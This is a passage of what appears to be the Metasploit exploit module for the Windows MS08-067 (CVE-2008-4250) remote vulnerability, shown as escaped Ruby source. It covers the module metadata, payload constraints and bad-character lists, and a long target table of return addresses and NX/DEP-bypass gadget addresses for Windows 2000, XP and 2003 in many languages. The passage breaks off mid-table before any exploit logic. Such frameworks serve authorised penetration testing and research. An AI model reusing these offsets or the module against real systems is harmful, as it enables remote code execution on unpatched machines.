successful\r\n\t\t\t\texploitation events, but 2003 targets will often crash or hang on subsequent\r\n\t\t\t\tattempts. This is just the first version of this module, full support for\r\n\t\t\t\tNX bypass on 2003, along with other platforms, is still in development.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'hdm', # with tons of input/help/testing from the community\r\n\t\t\t\t\t'Brett Moore <brett.moore[at]insomniasec.com>'\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 11614 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-4250'],\r\n\t\t\t\t\t[ 'OSVDB', '49243'],\r\n\t\t\t\t\t[ 'MSB', 'MS08-067' ],\r\n\t\t\t\t\t# If this vulnerability is found, ms08-67 is exposed as well\r\n\t\t\t\t\t[ 'NEXPOSE', 'dcerpc-ms-netapi-netpathcanonicalize-dos']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 400,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40\",\r\n\t\t\t\t\t'Prepend' => \"\\x81\\xE4\\xF0\\xFF\\xFF\\xFF\", # stack alignment\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Automatic targetting via fingerprinting\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ 'Automatic Targeting', { 'auto' => true }\t],\r\n\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# UNIVERSAL TARGETS\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Antoine's universal for Windows 2000\r\n\t\t\t\t\t# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ 'Windows 2000 Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x001f1cb0,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP EDI SVCHOST.EXE\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Standard return-to-ESI without NX bypass\r\n\t\t\t\t\t# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ 'Windows XP SP0/SP1 Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x01001361,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI SVCHOST.EXE\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# ENGLISH TARGETS\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 English (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x6f88f727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x6f8916e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 English (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x6f88f807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x6f8917c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Standard return-to-ESI without NX bypass\r\n\t\t\t\t\t[ 'Windows 2003 SP0 Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x0100129e,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI SVCHOST.EXE\r\n\r\n\r\n\t\t\t\t\t# Standard return-to-ESI without NX bypass\r\n\t\t\t\t\t[ 'Windows 2003 SP1 English (NO NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x71bf21a2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI WS2HELP.DLL\r\n\r\n\t\t\t\t\t# Brett Moore's crafty NX bypass for 2003 SP1\r\n\t\t\t\t\t[ 'Windows 2003 SP1 English (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'RetDec' => 0x7c90568c,\t # dec ESI, ret @SHELL32.DLL\r\n\t\t\t\t\t\t\t'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL\r\n\t\t\t\t\t\t\t'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL\r\n\t\t\t\t\t\t\t'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\r\n\t\t\t\t\t# Standard return-to-ESI without NX bypass\r\n\t\t\t\t\t[ 'Windows 2003 SP1 Japanese (NO NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x71a921a2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI WS2HELP.DLL\r\n\r\n\r\n\t\t\t\t\t# Standard return-to-ESI without NX bypass\r\n\t\t\t\t\t[ 'Windows 2003 SP2 English (NO NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x71bf3969,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI WS2HELP.DLL\r\n\r\n\t\t\t\t\t# Brett Moore's crafty NX bypass for 2003 SP2\r\n\t\t\t\t\t[ 'Windows 2003 SP2 English (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL\r\n\t\t\t\t\t\t\t'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL\r\n\t\t\t\t\t\t\t'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL\r\n\t\t\t\t\t\t\t'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\r\n\t\t\t\t\t# Standard return-to-ESI without NX bypass\r\n\t\t\t\t\t[ 'Windows 2003 SP2 German (NO NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x71a03969,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI WS2HELP.DLL\r\n\r\n\t\t\t\t\t# Brett Moore's crafty NX bypass for 2003 SP2\r\n\t\t\t\t\t[ 'Windows 2003 SP2 German (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL\r\n\t\t\t\t\t\t\t'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL\r\n\t\t\t\t\t\t\t'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL\r\n\t\t\t\t\t\t\t'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Arabic (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x6fd8f727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x6fd916e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Chinese - Traditional / Taiwan (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5860f727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x586116e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Chinese - Simplified (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x58fbf727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x58fc16e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Chinese - Traditional (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5860f727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x586116e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Czech (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x6fe1f727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x6fe216e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Danish (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5978f727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x597916e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 German (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x6fd9f727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x6fda16e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Greek (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x592af727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x592b16e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Spanish (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x6fdbf727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x6fdc16e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Finnish (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x597df727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x597e16e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 French (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x595bf727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x595c16e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Hebrew (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5940f727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x594116e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Hungarian (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5970f727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x597116e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Italian (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x596bf727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x596c16e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Japanese (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x567fd3be,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x568016e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Korean (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x6fd6f727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x6fd716e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Dutch (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x596cf727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x596d16e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Norwegian (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x597cf727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x597d16e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Polish (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5941f727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x594216e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Portuguese - Brazilian (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x596ff727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x597016e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Portuguese (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x596bf727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x596c16e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Russian (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x6fe1f727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x6fe216e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Swedish (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x597af727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x597b16e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP2 Turkish (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5a78f727,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x5a7916e2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Arabic (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x6fd8f807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x6fd917c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5860f807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x586117c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Chinese - Simplified (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x58fbf807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x58fc17c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Chinese - Traditional (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5860f807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x586117c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Czech (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x6fe1f807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x6fe217c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Danish (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5978f807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x597917c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 German (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x6fd9f807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x6fda17c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Greek (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x592af807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x592b17c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Spanish (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x6fdbf807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x6fdc17c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Finnish (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x597df807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x597e17c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 French (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x595bf807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x595c17c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Hebrew (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5940f807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x594117c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Hungarian (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5970f807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x597117c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Italian (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x596bf807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x596c17c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Japanese (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x567fd4d2,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x568017c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Korean (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x6fd6f807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x6fd717c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS 